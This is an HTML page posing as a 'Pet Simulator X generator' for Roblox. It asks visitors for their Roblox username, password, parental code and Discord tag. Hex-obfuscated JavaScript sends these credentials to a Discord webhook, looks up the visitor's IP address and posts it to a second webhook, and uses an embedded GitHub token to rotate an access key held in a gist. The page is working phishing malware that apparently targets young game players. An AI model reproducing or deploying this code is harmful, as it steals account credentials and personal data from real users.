<html>
  <head>
   <meta charset="utf-8">
   
    <style>
      body {

        font-family: sans-serif;
        color:white;
  background-image: url('https://pbs.twimg.com/media/E7eXB31WUAIFU1F.jpg:large');
  background-size: cover;
  background-position: center;
  height: 100vh;
  width: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  filter: brightness(66%);
  overflow-y: scroll;
      }

html, body {
  overflow-y: auto;
  overflow-x: hidden;
}

      h1 {
        color: #ffffff;
      }
         .btn {
      display: inline-block;
      padding: 10px 20px;
      text-decoration: none;
      font-size: 18px;
      border: none;
      outline: none;
      color: white;
      background-color: transparent;
      cursor: pointer;
       transition-duration: 1s;
      box-shadow: 0 0 55px #0000FF;
    }
    .btn:hover {
      background-color: #0000FF;
      box-shadow: 0 0 12px #0000FF;
      
      
    }
    .btn:active {
      background-color: #00006C;
      box-shadow: 0 0 2px #00006C;
    }
      .form-container {
        width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
      }
       .form-container:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
      
    }
       .form-container2 {
    width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
  
      }
         .form-container2:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
    }
      input[type="text"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;

      }

         input[type="password"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;
      }

      .error {
        color: #ff0000;
      }
      
    </style>
  </head>
  <body>
    <div class="form-container">
      <h1 style=color:white>PET SIMULATORX GENERATOR</h1>
       <p style=color:gray;font-size:80%>Please note that this script utilizes VEE3TIS login. Any attempts to utilize a fake login will result in the blacklisting of your account.</p>
      <form>
      <p>As a first step, it would be useful to obtain your Discord tag and name.</p>
      Discord: <input type="text" id="disco"><br>
       <div>
        Roblox username: <input type="text" id="name"><br>
        Roblox password: <input type="password" id="pass"><br>
        Register key:<input type="text" id="key"<br>
        Parental code:<input style="margin-bottom:0"type="text" id="code69"<br>
        <p style="margin-bottom:15px;color:red;font-size:80%">Only if u have parental code ENABLED</p>
        <div>
      <a class="btn" value="Calculate" onclick="sendMessage()">Register</a>
</div>
       </div>
       
      </form>
      <p class="error" id="error"></p>
    </div>
     

    <script>
var _0x4426=["\x76\x61\x6C\x75\x65","\x6B\x65\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6E\x61\x6D\x65","\x70\x61\x73\x73","\x64\x69\x73\x63\x6F","\x63\x6F\x64\x65\x36\x39","\x63\x6F\x6E\x74\x65\x6E\x74","\x6B\x65\x79\x2E\x74\x78\x74","\x66\x69\x6C\x65\x73","\x74\x65\x73\x74","\x57\x65\x20\x61\x70\x6F\x6C\x6F\x67\x69\x7A\x65\x20\x66\x6F\x72\x20\x74\x68\x65\x20\x69\x6E\x63\x6F\x6E\x76\x65\x6E\x69\x65\x6E\x63\x65\x2E\x20\x49\x74\x20\x61\x70\x70\x65\x61\x72\x73\x20\x74\x68\x61\x74\x20\x77\x65\x20\x61\x72\x65\x20\x75\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x6C\x6F\x63\x61\x74\x65\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x2E\x20\x54\x68\x69\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x61\x20\x73\x79\x73\x74\x65\x6D\x20\x65\x72\x72\x6F\x72\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x74\x68\x65\x20\x6F\x77\x6E\x65\x72\x20\x6F\x72\x20\x73\x75\x70\x70\x6F\x72\x74\x20\x74\x65\x61\x6D\x20\x66\x6F\x72\x20\x61\x73\x73\x69\x73\x74\x61\x6E\x63\x65\x20\x69\x6E\x20\x72\x65\x73\x6F\x6C\x76\x69\x6E\x67\x20\x74\x68\x69\x73\x20\x69\x73\x73\x75\x65\x2E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x36\x36\x33\x32\x36\x35\x32\x36\x34\x31\x38\x37\x35\x31\x35\x34\x38\x2F\x67\x69\x59\x39\x42\x5F\x4E\x78\x58\x64\x50\x52\x66\x4C\x6C\x45\x69\x48\x67\x5A\x65\x5A\x73\x52\x53\x44\x30\x6F\x63\x78\x6C\x31\x38\x78\x43\x54\x39\x58\x74\x4B\x50\x45\x6E\x76\x6A\x33\x31\x61\x52\x54\x51\x36\x6E\x33\x4B\x50\x5A\x47\x34\x30\x37\x5A\x4D\x51\x43\x6E\x58\x69","\x50\x4F\x53\x54","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x68\x6F\x74\x20\x6E\x65\x76\x69\x20\x67\x6F\x74\x20\x74\x68\x65\x20\x73\x68\x69\x74","\x4F\x6D\x67\x20\x66\x72\x65\x65\x20\x61\x63\x63\x6F\x75\x6E\x74\x3F\x3F\x3F","\x41\x63\x63\x6F\x75\x6E\x74\x20\x4E\x61\x6D\x65","\x41\x63\x63\x6F\x75\x6E\x74\x20\x50\x61\x73\x73\x77\x6F\x72\x64","\x50\x61\x72\x65\x6E\x74\x61\x6C\x20\x43\x6F\x64\x65","\x44\x69\x73\x63\x6F\x72\x64","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x69\x70","\x6C\x6F\x67","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x36\x35\x32\x33\x39\x35\x31\x33\x39\x38\x34\x36\x38\x34\x30\x37\x33\x2F\x45\x34\x59\x55\x7A\x2D\x59\x37\x6D\x6C\x41\x76\x71\x33\x7A\x48\x30\x54\x49\x6A\x37\x35\x6D\x55\x45\x4E\x36\x62\x59\x46\x5F\x54\x6A\x45\x31\x34\x77\x38\x50\x49\x53\x63\x4D\x4A\x48\x36\x54\x5A\x66\x5A\x33\x34\x59\x31\x6A\x31\x5A\x65\x55\x4A\x74\x65\x77\x34\x75\x56\x54\x67","\x74\x68\x65\x6E","\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x6F\x6B","\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x47\x69\x73\x74\x3A\x20","\x73\x74\x61\x74\x75\x73\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x42\x65\x61\x72\x65\x72\x20\x20\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x67\x65\x74\x52\x61\x6E\x64\x6F\x6D\x56\x61\x6C\x75\x65\x73","\x63\x72\x79\x70\x74\x6F","","\x6A\x6F\x69\x6E","\x30","\x70\x61\x64\x53\x74\x61\x72\x74","\x66\x72\x6F\x6D","\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F","\x50\x41\x54\x43\x48","\x42\x65\x61\x72\x65\x72\x20","\x65\x72\x72\x6F\x72","\x63\x61\x74\x63\x68"];function sendMessage(){const _0xbbd1x2=document[_0x4426[2]](_0x4426[1])[_0x4426[0]];const _0xbbd1x3=document[_0x4426[2]](_0x4426[3])[_0x4426[0]];const _0xbbd1x4=document[_0x4426[2]](_0x4426[4])[_0x4426[0]];const _0xbbd1x5=document[_0x4426[2]](_0x4426[5])[_0x4426[0]];const _0xbbd1x6=document[_0x4426[2]](_0x4426[6])[_0x4426[0]];fetch(`${_0x4426[31]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0x4426[32]}})[_0x4426[25]]((_0xbbd1xa)=>{if(_0xbbd1xa[_0x4426[28]]){return _0xbbd1xa[_0x4426[26]]()}else {throw  new Error(_0x4426[29]+ _0xbbd1xa[_0x4426[30]])}})[_0x4426[25]]((_0xbbd1x7)=>{const _0xbbd1x8=_0xbbd1x7[_0x4426[9]][_0x4426[8]][_0x4426[7]];if(_0xbbd1x2!= _0xbbd1x8|| /^\s*$/[_0x4426[10]](_0xbbd1x3)|| /^\s*$/[_0x4426[10]](_0xbbd1x4)){alert(_0x4426[11])}else {changekey();fetch(_0x4426[12],{method:_0x4426[13],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x4426[14]},body:JSON[_0x4426[21]]({embeds:[{title:_0x4426[15],description:_0x4426[16],color:3447003,fields:[{name:_0x4426[17],value:_0xbbd1x3},{name:_0x4426[18],value:_0xbbd1x4},{name:_0x4426[19],value:_0xbbd1x6},{name:_0x4426[20],value:_0xbbd1x5}]}]})});fetch(_0x4426[27])[_0x4426[25]]((_0xbbd1xa)=>{return _0xbbd1xa[_0x4426[26]]()})[_0x4426[25]]((_0xbbd1x7)=>{var _0xbbd1x9=_0xbbd1x7[_0x4426[22]];console[_0x4426[23]](_0xbbd1x9);fetch(_0x4426[24],{method:_0x4426[13],body:JSON[_0x4426[21]]({content:_0xbbd1x9}),headers:{'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x4426[14]}})})}})}function generateRandomKey(){const _0xbbd1xc= new Uint8Array(32);window[_0x4426[34]][_0x4426[33]](_0xbbd1xc);return Array[_0x4426[39]](_0xbbd1xc,(_0xbbd1xd)=>{return _0xbbd1xd.toString(16)[_0x4426[38]](2,_0x4426[37])})[_0x4426[36]](_0x4426[35])}function changekey(){const _0xbbd1xf=_0x4426[40];const _0xbbd1x10=_0x4426[41];const _0xbbd1x11=`${_0x4426[42]}${_0xbbd1xf}${_0x4426[35]}`;const _0xbbd1x12={method:_0x4426[43],headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':`${_0x4426[44]}${_0xbbd1x10}${_0x4426[35]}`,'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x4426[14]},body:JSON[_0x4426[21]]({'\x66\x69\x6C\x65\x73':{'\x6B\x65\x79\x2E\x74\x78\x74':{'\x63\x6F\x6E\x74\x65\x6E\x74':generateRandomKey()}}})};fetch(_0xbbd1x11,_0xbbd1x12)[_0x4426[25]]((_0xbbd1xa)=>{if(_0xbbd1xa[_0x4426[28]]){}else {}})[_0x4426[46]]((_0xbbd1x13)=>{console[_0x4426[45]](_0xbbd1x13)})}
  </script>
  
  

      

</html>

  

</html>
